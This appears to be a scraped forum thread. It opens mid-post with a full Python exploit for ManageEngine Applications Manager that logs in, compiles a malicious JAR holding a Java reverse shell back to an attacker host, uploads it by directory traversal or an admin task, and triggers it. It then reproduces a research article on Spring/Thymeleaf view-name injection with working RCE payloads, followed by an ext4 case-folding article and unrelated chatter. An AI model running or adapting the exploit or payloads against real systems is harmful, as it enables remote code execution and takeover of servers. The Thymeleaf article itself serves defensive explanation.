171 */ Class cls = jarLoader.loadClass("weblogic.jndi.Environment"); # 172 /* 172 */ Object env = cls.newInstance(); # Example call for MAM version 12900: # $ python3 poc_mam_weblogic_upload_and_exec_jar.py https://192.168.252.12:8443 admin admin weblogic.jar # [*] Visiting page to retrieve initial cookies... # [*] Retrieving admin cookie... # [*] Getting base directory of ManageEngine... # [*] Found base directory: C:\Program Files (x86)\ManageEngine\AppManager12 # [*] Creating JAR file... # Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true # Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true # added manifest # adding: weblogic/jndi/Environment.class(in = 1844) (out= 1079)(deflated 41%) # [*] Uploading JAR file... # [*] Attempting to upload JAR directly to targeted Weblogic folder... # [*] Copied successfully via Directory Traversal, jumping directly to call vulnerable function! # [*] Running the Weblogic credentialtest which triggers the code in the JAR... # [*] Check your shell... # Function flow: # 1. Get initial cookie # 2. Get valid session cookie by logging in # 3. Get base directory of installation # 4. Generate a malicious JAR file # 5. Attempt to directly upload JAR, if success, jump to 7 # 6. Create task with random ID to copy JAR file to expected Weblogic location # 7. Execute task # 8. Delete task for cleanup # 9. Run the vulnerable credentialTest, using the malicious JAR import requests import urllib3 import shutil import subprocess import os import sys import random import re from lxml import html # Optionally, use a proxy # proxy = "http://<user>:<pass>@<proxy>:<port>" proxy = "" os.environ['http_proxy'] = proxy os.environ['HTTP_PROXY'] = proxy os.environ['https_proxy'] = proxy os.environ['HTTPS_PROXY'] = proxy # Disable cert warnings urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) # Set timeout timeout = 10 # Handle CTRL-C def keyboard_interrupt(): """Handles keyboardinterrupt exceptions""" print("\n\n[*] User requested an interrupt, exiting...") exit(0) # Custom headers def http_headers(): headers = { 'User-Agent': 'Mozilla', } return headers def get_initial_cookie(url,headers): print("[*] Visiting page to retrieve initial cookies...") target = url + "/index.do" r = requests.get(target,headers=headers,timeout=timeout,verify=False) return r.cookies def get_valid_cookie(url,headers,initial_cookies,usern,passw): print("[*] Retrieving admin cookie...") appl_cookie = "JSESSIONID_APM_9090" post_data = {'clienttype':'html', 'webstart':'', 'j_username':usern, 'ScreenWidth':'1280', 'ScreenHeight':'709', 'username':usern, 'j_password':passw, 'submit':'Login'} target = url + "/j_security_check" r = requests.post(target,data=post_data,headers=headers,cookies=initial_cookies,timeout=timeout,verify=False) res = r.text if "Server responded in " in res: return r.cookies else: print("[!] No valid response from used session, exiting!\n") exit(-1) def get_base_dir(url,headers,valid_cookie): print("[*] Getting base directory of ManageEngine...") target = url + "/common/serverinfo.do" params = {'service':'AppManager', 'reqForAdminLayout':'true'} r = requests.get(target,params=params,headers=headers,cookies=valid_cookie,timeout=timeout,verify=False) tree = html.fromstring(r.content) pathname = tree.xpath('//table[@class="lrbtborder"]/tr[6]/td[2]/@title') base_dir = pathname[0] print("[*] Found base directory: " + base_dir) return base_dir def create_jar(command,jarname,revhost,revport): print("[*] Creating JAR file...") # Variables classname = "Environment" pkgname = "weblogic.jndi" fullname = pkgname + "." + classname manifest = "MANIFEST.MF" # Directory variables curdir = os.getcwd() metainf_dir = "META-INF" maindir = "weblogic" subdir = maindir + "/jndi" builddir = curdir + "/" + subdir # Check if directory exist, else create directory try: if os.path.isdir(builddir): pass else: os.makedirs(builddir) except OSError: print("[!] Error creating local directory \"" + builddir + "\", check permissions...") exit(-1) # Creating the text file using given parameters javafile = '''package ''' + pkgname + '''; import java.io.IOException; import java.io.InputStream; import java.io.OutputStream; import java.net.Socket; import java.util.concurrent.TimeUnit; public class ''' + classname + ''' { // This method is being called by lookupMBeanServer() in com/adventnet/appmanager/server/wlogic/statuspoll/WeblogicReference.java // Uses the jarLoader.loadClass() method to load and initiate a new instance via newInstance() public void setProviderUrl(String string) throws Exception { System.out.println("Hello from setProviderUrl()"); connect(); } // Normal main() entry public static void main(String args[]) throws Exception { System.out.println("Hello from main()"); // Added delay to notice being called from main() TimeUnit.SECONDS.sleep(10); connect(); } // Where the magic happens public static void connect() throws Exception { String host = "''' + revhost + '''"; int port = ''' + str(revport) + '''; String[] cmd = {"''' + command + '''"}; Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start(); Socket s=new Socket(host,port); InputStream pi=p.getInputStream(),pe=p.getErrorStream(),si=s.getInputStream(); OutputStream po=p.getOutputStream(),so=s.getOutputStream(); while(!s.isClosed()) { while(pi.available()>0) so.write(pi.read()); while(pe.available()>0) so.write(pe.read()); while(si.available()>0) po.write(si.read()); so.flush(); po.flush(); try { p.exitValue(); break; } catch (Exception e){ } }; p.destroy(); s.close(); } }''' # Output file to desired directory os.chdir(builddir) print(javafile,file=open(classname + ".java","w")) # Go to previous directory to create JAR file os.chdir(curdir) # Create the compiled .class file cmdCompile = "javac --release 7 " + subdir + "/*.java" process = subprocess.call(cmdCompile,shell=True) # Creating Manifest file try: if os.path.isdir(metainf_dir): pass else: os.makedirs(metainf_dir) except OSError: print("[!] Error creating local directory \"" + metainf_dir + "\", check permissions...") exit(-1) print("Main-Class: " + fullname,file=open(metainf_dir + "/" + manifest,"w")) # Create JAR file cmdJar = "jar cmvf " + metainf_dir + "/" + manifest + " " + jarname + " " + subdir + "/*.class" process = subprocess.call(cmdJar,shell=True) # Cleanup directories try: shutil.rmtree(metainf_dir) shutil.rmtree(maindir) except: print("[!] Error while cleaning up directories.") return True def upload_jar(url,headers,valid_cookie,jarname,rel_path): print("[*] Uploading JAR file...") target = url + "/Upload.do" path_normal = './' path_trav = rel_path jar = {'theFile':(jarname,open(jarname, 'rb'))} print("[*] Attempting to upload JAR directly to targeted Weblogic folder...") post_data = {'uploadDir':path_trav} r_upload = requests.post(target, data=post_data, headers=headers, files=jar, cookies=valid_cookie, timeout=timeout,verify=False) res = r_upload.text if "successfully uploaded" not in res: print("[!] Failed to upload JAR directly, continue to add and execute job to move JAR...") post_data = {'uploadDir':path_normal} jar = {'theFile':(jarname,open(jarname, 'rb'))} r_upload = requests.post(target, data=post_data, headers=headers, files=jar, cookies=valid_cookie, timeout=timeout,verify=False) return "normal_path" else: print("[*] Copied successfully via Directory Traversal, jumping directly to call vulnerable function!") return "trav_path" def create_task(url,headers,valid_cookie,action_name,rel_path,work_dir): print("[*] Creating a task to move the JAR file to relative path: " + rel_path + "...") valid_resp = "Execute Program succesfully created." target = url + "/adminAction.do" post_data = {'actions':'/adminAction.do?method=showExecProgAction&haid=null', 'method':'createExecProgAction', 'id':'0', 'displayname':action_name, 'serversite':'local', 'choosehost':'-2', 'prompt':'$', 'command':'move weblogic.jar ' + rel_path, 'execProgExecDir':work_dir, 'abortafter':'10', 'cancel':'false'} r = requests.post(target,data=post_data,headers=headers,cookies=valid_cookie,timeout=timeout,verify=False) res = r.text found_id = "" if action_name in res: tree = html.fromstring(r.content) actionurls = tree.xpath('//table[@id="executeProgramActionTable"]/tr[@class="actionsheader"]/td[2]/a/@onclick') actionnames = tree.xpath('//table[@id="executeProgramActionTable"]/tr[@class="actionsheader"]/td[2]/a/text()') i = 0 for name in actionnames: for url in actionurls: if action_name in name: found_id = re.search(".*actionid=(.+?)','", actionurls[i]).group(1) print("[*] Found actionname: " + action_name + " with found actionid " + found_id) break i+=1 return found_id else: print("[!] Actionname not found. Task probably wasn't created, please check. Exiting.") exit(-1) def exec_task(url,headers,valid_cookie,found_id): print("[*] Executing created task with id: " + found_id + " to copy JAR...") valid_resp = "has been successfully executed" target = url + "/common/executeScript.do" params = {'method':'testAction', 'actionID':found_id, 'haid':'null'} r = requests.get(target,params=params,headers=headers,cookies=valid_cookie,timeout=timeout,verify=False) res = r.text if valid_resp in res: print("[*] Task " + found_id + " has been executed successfully") else: print("[!] Task not executed. Check requests, exiting...") exit(-1) return def del_task(url,headers,valid_cookie,found_id): print("[*] Deleting created task as JAR has been copied...") target = url + "/adminAction.do" params = {'method':'deleteProgExecAction'} post_data = {'haid':'null', 'headercheckbox':'on', 'progcheckbox':found_id} r = requests.post(target,params=params,data=post_data,headers=headers,cookies=valid_cookie,timeout=timeout,verify=False) def run_credtest(url,headers,valid_cookie): print("[*] Running the Weblogic credentialtest which triggers the code in the JAR...") target = url + "/testCredential.do" post_data = {'method':'testCredentialForConfMonitors', 'serializedData':'url=/jsp/newConfType.jsp', 'searchOptionValue':'', 'query':'', 'addtoha':'null', 'resourceid':'', 'montype':'WEBLOGIC:7001', 'isAgentEnabled':'NO', 'resourcename':'null', 'isAgentAssociated':'false', 'hideFieldsForIT360':'null', 'childNodesForWDM':'[]', 'csrfParam':'', 'type':'WEBLOGIC:7001', 'displayname':'test', 'host':'localhost', 'netmask':'255.255.255.0', 'resolveDNS':'False', 'port':'7001', 'CredentialDetails':'nocm', 'cmValue':'-1', 'version':'WLS_8_1', 'sslenabled':'False', 'username':'test', 'password':'test', 'pollinterval':'5', 'groupname':''} print("[*] Check your shell...") requests.post(target,data=post_data,headers=headers,cookies=valid_cookie,verify=False) return # Main def main(argv): if len(sys.argv) == 6: url = sys.argv[1] usern = sys.argv[2] passw = sys.argv[3] revhost = sys.argv[4] revport = sys.argv[5] else: print("[*] Usage: " + sys.argv[0] + " <url> <username> <password> <reverse_shell_host> <reverse_shell_port>") print("[*] Example: " + sys.argv[0] + " https://192.168.252.12:8443 admin admin 192.168.252.14 6666\n") exit(0) # Do stuff try: # Set HTTP headers headers = http_headers() # Relative path to copy the malicious JAR file rel_path = "classes/weblogic/version8/" # Generate a random ID to use for the task name and task tracking random_id = str(random.randrange(0000,9999)) # Action_name used for displaying actions in overview action_name = "move_weblogic_jar" + random_id # Working dir to append to base dir base_append = "\\working\\" # Name for JAR file to use jarname = "weblogic.jar" # Command shell to use cmd = "cmd.exe" # Execute functions initial_cookies = get_initial_cookie(url,headers) valid_cookie = get_valid_cookie(url,headers,initial_cookies,usern,passw) work_dir = get_base_dir(url,headers,valid_cookie) + base_append create_jar(cmd,jarname,revhost,revport) status_jar = upload_jar(url,headers,valid_cookie,jarname,rel_path) # Check if JAR can be uploaded via Directory Traversal # If so, no need to add and exec actions; just run the credentialtest directly if status_jar == "trav_path": run_credtest(url,headers,valid_cookie) # Cannot be uploaded via Directory Traversal, add and exec actions to move JAR. Lastly, run the vulnerable credentialtest elif status_jar == "normal_path": found_id = create_task(url,headers,valid_cookie,action_name,rel_path,work_dir) exec_task(url,headers,valid_cookie,found_id) del_task(url,headers,valid_cookie,found_id) run_credtest(url,headers,valid_cookie) except requests.exceptions.Timeout: print("[!] Timeout error\n") exit(-1) except requests.exceptions.TooManyRedirects: print("[!] Too many redirects\n") exit(-1) except requests.exceptions.ConnectionError: print("[!] Not able to connect to URL\n") exit(-1) except requests.exceptions.RequestException as e: print("[!] " + e) exit(-1) except requests.exceptions.HTTPError as e: print("[!] Failed with error code - " + e.code + "\n") exit(-1) except KeyboardInterrupt: keyboard_interrupt() # If we were called as a program, go execute the main function. if __name__ == "__main__": main(sys.argv[1:]) Source
  18. In this article, we explain how dangerous an unrestricted view name manipulation in Spring Framework could be. Before doing so, let's look at the simplest Spring application that uses Thymeleaf as a templating engine: HelloController.java: @Controller public class HelloController { @GetMapping("/") public String index(Model model) { model.addAttribute("message", "happy birthday"); return "welcome"; } } Due to the use of @Controller and @GetMapping("/") annotations, this method will be called for every HTTP GET request for the root url ('/'). It does not have any parameters and returns a static string "welcome". Spring framework interprets "welcome" as a View name, and tries to find a file "resources/templates/welcome.html" located in the application resources. If it finds it, it renders the view from the template file and returns to the user. If the Thymeleaf view engine is in use (which is the most popular for Spring), the template may look like this: welcome.html: <!DOCTYPE HTML> <html lang="en" xmlns:th="http://www.thymeleaf.org"> <div th:fragment="header"> <h3>Spring Boot Web Thymeleaf Example</h3> </div> <div th:fragment="main"> <span th:text="'Hello, ' + ${message}"></span> </div> </html> Thymeleaf engine also support file layouts. For example, you can specify a fragment in the template by using <div th:fragment="main"> and then request only this fragment from the view: @GetMapping("/main") public String fragment() { return "welcome :: main"; } Thymeleaf is intelligent enough to return only the 'main' div from the welcome view, not the whole document. From a security perspective, there may be a situation when a template name or a fragment are concatenated with untrusted data. For example, with a request parameter: @GetMapping("/path") public String path(@RequestParam String lang) { return "user/" + lang + "/welcome"; //template path is tainted } @GetMapping("/fragment") public String fragment(@RequestParam String section) { return "welcome :: " + section; //fragment is tainted } The first case may contain a potential path traversal vulnerability, but a user is limited to the 'templates' folder on the server and cannot view any files outside it. The obvious exploitation approach would be to try to find a separate file upload and create a new template, but that's a different issue. Luckily for bad guys, before loading the template from the filesystem, Spring ThymeleafView class parses the template name as an expression: try { // By parsing it as a standard expression, we might profit from the expression cache fragmentExpression = (FragmentExpression) parser.parseExpression(context, "~{" + viewTemplateName + "}"); } So, the aforementioned controllers may be exploited not by path traversal, but by expression language injection: Exploit for /path (should be url-encoded) GET /path?lang=__${new java.util.Scanner(T(java.lang.Runtime).getRuntime().exec("id").getInputStream()).next()}__::.x HTTP/1.1 In this exploit we use the power of expression preprocessing: by surrounding the expression with __${ and }__::.x we can make sure it's executed by thymeleaf no matter what prefixes or suffixes are. To summarize, whenever untrusted data comes to a view name returned from the controller, it could lead to expression language injection and therefore to Remote Code Execution. Even more magic In the previous examples, controllers return strings, explicitly telling Spring what view name to use, but that's not always the case. As described in the documentation, for some return types such as void, java.util.Map or org.springframework.ui.Model: It means that a controller like this: @GetMapping("/doc/{document}") public void getDocument(@PathVariable String document) { log.info("Retrieving " + document); } may look absolutely innocent at first glance, it does almost nothing, but since Spring does not know what View name to use, it takes it from the request URI. Specifically, DefaultRequestToViewNameTranslator does the following: /** * Translates the request URI of the incoming {@link HttpServletRequest} * into the view name based on the configured parameters. * @see org.springframework.web.util.UrlPathHelper#getLookupPathForRequest * @see #transformPath */ @Override public String getViewName(HttpServletRequest request) { String lookupPath = this.urlPathHelper.getLookupPathForRequest(request, HandlerMapping.LOOKUP_PATH); return (this.prefix + transformPath(lookupPath) + this.suffix); } So it also become vulnerable as the user controlled data (URI) comes directly to view name and resolved as expression. Exploit for /doc (should be url-encoded) GET /doc/__${T(java.lang.Runtime).getRuntime().exec("touch executed")}__::.x HTTP/1.1 Safe case: ResponseBody There are also some cases when a controller returns a used-controlled value, but they are not vulnerable to view name manipulation. For example, when the controller is annotated with @ResponseBody: @GetMapping("/safe/fragment") @ResponseBody public String safeFragment(@RequestParam String section) { return "welcome :: " + section; //FP, as @ResponseBody annotation tells Spring to process the return values as body, instead of view name } In this case, Spring Framework does not interpret it as a view name, but just returns this string in HTTP Response. The same applies to @RestController on a class, as internally it inherits @ResponseBody. Safe case: A redirect @GetMapping("/safe/redirect") public String redirect(@RequestParam String url) { return "redirect:" + url; //CWE-601, as we can control the hostname in redirect } When the view name is prepended by "redirect:" the logic is also different. In this case, Spring does not use Spring ThymeleafView anymore but a RedirectView, which does not perform expression evaluation. This example still has an open redirect vulnerability, but it is certainly not as dangerous as RCE via expression evaluation. Safe case: Response is already processed @GetMapping("/safe/doc/{document}") public void getDocument(@PathVariable String document, HttpServletResponse response) { log.info("Retrieving " + document); //FP } This case is very similar to one of the previous vulnerable examples, but since the controller has HttpServletResponse in parameters, Spring considers that it's already processed the HTTP Response, so the view name resolution just does not happen. This check exists in the ServletResponseMethodArgumentResolver class. Conclusion Spring is a framework with a bit of magic, it allows developers to write less code but sometimes this magic turns black. It's important to understand situations when user controlled data goes to sensitive variables (such as view names) and prevent them accordingly. Stay safe. Test locally Java 8+ and Maven required cd spring-view-manipulation mvn spring-boot:run curl 'localhost:8090/path?lang=__$%7bnew%20java.util.Scanner(T(java.lang.Runtime).getRuntime().exec(%22id%22).getInputStream()).next()%7d__::.x' Credits This project was co-authored by Michael Stepankin and Giuseppe Trovato at Veracode Authors would like to thank Aleksei Tiurin from Acunetix for the excellent research on SSTI vulnerabilities in Thymeleaf Source: github.com
  19. //scuzele mele, il am la ignore pe retardat
  20. Salut, se pot transfera absolut toate datele de pe un telefon pe altul identic? inclusiv pattern display (Android) *Fara service PS: m-a prins ploo si am zis ca este cald afara; P.S.2: se supraincalzeste, sub 15% autonomie nu face nazuri, dar ce este in + se modifica brightness si afiseaza ""Seamless Screen Error " Thanks for your attention. I’m looking forward to your reply.
  21. Linux 5.2 was released over one year ago and with it, a new feature was added to support optimized case-insensitive file name lookups in the Ext4 filesystem - the first of native Linux filesystems to do it. Now, one year after this quite controversial feature was made available, Collabora and others keep building on top of it to make it more and more useful for system developers and end users. Therefore, this seems like a good time as any to take a look on why this was merged, and how to put it to work. More recently, f2fs has started to support this feature as well, following the Ext4 implementation and framework, thanks to an effort led by Google. Most, if not all, of the information described here also applies to f2fs, with small changes on the commands used to configure the superblock. Why Case-insensitive in the kernel? A file name is a text string used to uniquely identify a file (in this context, "directory" is the same as a file) at a specific level of the directory hierarchy. While, from the operating system point of view, it doesn't matter what the file name is, as long as it is unique, meaningful file names are essential for the end user, since it is the main key to locate and retrieve data. In other words, a meaningful file name is what people rely upon to find their valuable documents, pictures and spreadsheets. Traditionally, Linux (and Unix) filesystems have always considered file names as an opaque byte sequence without any special meaning, requiring users to submit the exact match of the file to find it in the filesystem. But that is not how humans operate. When people write titles, "important report.ods" and "IMPORTANT REPORT.ods" usually mean the same piece of data, and you don't care how it was written when creating it. We care about the content and the semantics of the words IMPORTANT and REPORT. In English, the only situation where different spelling of a word mean the same thing is when dealing with uppercase and lowercase, but for other languages, that is not the case. Some languages have different scripts to represent the same information and it makes sense, for a user, to not care about which different writing system the file was titled originally, when retrieving the data later. Most of these linguistic differences have been solved by userspace applications in the past, but bringing this knowledge into the kernel allow us to resolve important bottlenecks for applications being ported from other operating systems, like windows Games, who cannot be simply recompiled to understand it is running on Linux and that the filesystem is now case-sensitive. In fact, making the kernel understand the process of language normalization and casefolding allow us to optimize our disk storage, such that the system can quickly retrieve the information requested. The end result is clear: a much more user-friendly Linux experience for end-users and a much better platform to run beloved Windows games with Steam on Linux. Before enabling ⚠ This is very important. Before enabling it, make sure your kernel supports case-insensitive Ext4, and that the encoding version you plan to use is supported. The kernel supports case-insensitive Ext4 if it was built with CONFIG_UNICODE=y. If you are not sure, you can verify it on a booted kernel by reading the sysfs file below. If it doesn't exist, case-insensitive was not compiled into your kernel. $ cat /sys/fs/ext4/features/casefold Currently, the kernel supports UTF-8 up to version 12.1. mkfs will always choose the latest version, but attempting to run a filesystem with a more recent UTF-8 version than the kernel supports is risky, and to preserve your data, the kernel will refuse to mount such filesystem. To solve this issue, a kernel update is required or mkfs can be configured to use an older version. A patch is queued for next release for the kernel to report on sysfs the latest supported revision of unicode. Notice that the following file might not be available in your system, even if CONFIG_UNICODE exists. $ cat /sys/fs/unicode/version Enabling Case-insensitive First of all, make sure you've read the section "Before enabling". Failing to follow those instructions may render your filesystem unmountable in your current kernel. To enable the feature, it takes two steps: one is to enable the filesystem-wide casefold feature on the volume's superblock. This doesn't immediately make any directories case-insensitive, so don't worry, but it prepares the disk to support casefolded directories. It also configures what encoding will be used. The second step is to configure a specific directory to be case-insensitive. But first, let's see how to create a disk supporting case-insensitive. Creating a filesystem that supports case-insensitive When creating a filesystem, you need to set the casefold feature in mkfs: $ mkfs -t ext4 -O casefold /dev/vda After that, when mounting the filesystem, you can verify that the filesystem correctly has the feature: $ dumpe2fs -h /dev/vda | grep 'Filesystem features' dumpe2fs 1.45.6 (20-Mar-2020) Filesystem features: has_journal ext_attr resize_inode dir_index filetype extent 64bit flex_bg casefold sparse_super large_file huge_file dir_nlink extra_isize metadata_csum The feature is enabled in the filesystem in /dev/vda if the line above includes the feature 'casefold'. Alternatively, you can mount the filesystem and check dmesg for the mount line: $ mount /dev/vda /mnt $ dmesg | tail EXT4-fs (vda): Using encoding defined by superblock: utf8-12.1.0 with flags 0x0 EXT4-fs (vda): mounted filesystem with ordered data mode. Opts: (null) From the output above, vda was mounted with case-insensitive enabled and utf8-12.1.0. Strict mode Historically, any byte, other than the trailing slash ('/') and the null byte ('\0'), is a valid part of filenames. This is because Unix filesystems see filenames as a sequence of slash-separated components that are just opaque byte sequences, without any meaning assigned to them. Higher level userspace software give them meaning by seeing them as characters for rendering. When talking about case-insensitive, nevertheless, the kernel needs to inspect and understand what a character really is and what the rules are for case-folding. That is the reason we adopt an encoding in the kernel, like we did with UTF-8. But, for any encoding one may choose, the requirements of what a valid name is, is much more strict. In fact, there are several sequences that are simply invalid text in UTF-8. When a program asks the kernel to create a file with those names, the kernel needs to decide whether pretend the name is valid somehow or to throw an error to the application. The vast majority of applications don't care about case-insensitiveness, and expect a filename to just be accepted, as long as it is a valid Unix name. These applications will fail if the kernel throws an error on what they expect is a valid name, so by default, if an application tries to use an invalid name on a case-insensitive directory, the kernel will just let it happen, and treat that single file as an opaque byte sequence. This is fine, but case-insensitive will not work for that file only. There are cases, on the other hand, were we want to be strict on what is accepted by the filesystem. Having bad filenames mixed with good ones is confusing, and open space for programs to misbehave. For those users, though, ext4 has an strict mode, which causes any attempt to create or rename a file with a bad name to fail and return an error to the application. To build an Ext4 filesystem with strict mode enabled, use: $ mkfs -t ext4 -O casefold -E encoding_flags=strict /dev/vda Mounting the case insensitive filesystem If everything went fine and tune2fs returned without any errors, next time you mount this filesystem your kernel log will show something like the line below: $ mount /dev/sda1 /mnt $ dmesg | tail EXT4-fs (sda1): Using encoding defined by superblock: utf8-12.1.0 with flags 0x0 It has two important pieces of information. The first, is the encoding used which, in the example above, is UTF-8 supporting the version 12.1.0 of the Unicode specification. The second piece information is the flags argument, in this case 0x0, which modifies the behavior of the filesystem when dealing with casefolding directories. At the time of this writing, the only flag supported is the Strict mode, in which case the flag mask would be 0x1. Making specific directories case insensitive After mounting a case-insensitive enabled filesystem, it is now possible to flip the 'Casefold' inode attribute ('+F') in empty directories to make the lookup of files inside them case-insensitive: $ mkdir CI_dir $ chattr +F CI_dir With that setting enabled, the following should succeed, instead of the last command returning "No such file or directory." $ touch CI_dir/hello_world $ ls CI_dir/HELLO_WORLD The directory case-sensitiveness can be verified using lsattr. For instance, in the example below, the F letter indicates that the CI_dir directory is case-insensitive. $ lsattr . -------------------- ./CS_dir ----------------F--- ./CI_dir To revert the setting, and make CIdir case-insensitive once again, the directory must be emptied, and then, the Casefold attribute removed: $ rm CI_dir/* $ chattr -F CI_dir $ lsattr . -------------------- ./CS_dir -------------------- ./CI_dir -------------------- ./lost+found It is a bit annoying to require the directory to be empty to flip the case-insensitive flag, but that is a technical requirement at the moment and unlikely to change in the future. In fact, to make the data of a case-insensitive directory accessible in a case-sensitive manner, it would be much easier to move it to a new directory: $ mkdir CS_dir $ mv CI_dir/* CS_dir/ $ rm -r CI_dir Would have a similar effect, from a simple point of view. The Casefold flag recurses into nested directories. Therefore: $ mkdir CI_dir $ chattr +F CI_dir $ mkdir CI_dir/foo $ lsattr CI_dir ----------------F--- CI_dir/foo It is possible to mix case-insensitive and case-sensitive directories in the same tree: $ mkdir CI_dir $ chattr +F CI_dir $ mkdir CI_dir/foo $ chattr -F foo $ lsattr . ----------------F--- CI_dir $ lsattr CI_dir -------------------- CI_dir/foo Remember however, in the examples above, the order of commands matter, since a directory cannot have its Casefold attribute flipped if it is not empty. Non-English characters Currently, only UTF-8 encoding is supported, and I am not aware of plans to expand it to more encodings. While different encodings make a lot of sense for Eastern languages speakers for encoding compression reasons, I'm not aware of anyone currently working on it for Linux. With that said, the Linux implementation performs the Canonical Decomposition normalization process before comparing strings. That means that canonically equivalent characters can be correctly searched using a different normalized name. For instance, in some languages like German, the upper-case version of the letter ß (Eszett), is SS (or U+1E9E ẞ LATIN CAPITAL LETTER SHARP S). Thus, it makes sense for a German speaker to look for a file named "floß" (raft, in English), using the string "FLOSS": $ touch CI_dir/floß $ CI_dir/FLOSS There are also multiple ways to combine accented characters. Our method ensures, for instance that multiple encodings of the word café (coffee, in portuguese) can be interchangeable on a casefolded lookup. Let's see something cool. For this to work, you might want to copy-paste the command below, instead of typing it. Let's create some files: $ touch CI_dir/café CI_dir/café CS_dir/café CS_dir/café How many files where created? Can you explain it? Conclusion The case-insensitive feature as implemented in Ext4 is a non-intrusive mechanism to support this feature for those who need it, while minimizing impact to other applications. Given the per-directory nature, it is safe to enable the feature bit filesystem-wide and let applications enable it on directories as needed. It is simple to use and should yield higher performance for user space applications that previously had to emulate it in userspace. Hopefully, we will soon see this feature being enabled by default for distro kernels. Source
  22. https://www.proofhub.com/articles/discord-alternatives a spus Neme ca incet incet ne vom intoarce la linia de cod idea ar fi un iRC cam voice blur, etc este un open source, cand il gasesc revin cu edit ar fi ok sa nu raspunda la intrebarile de ^ in timp real
×
×
  • Create New...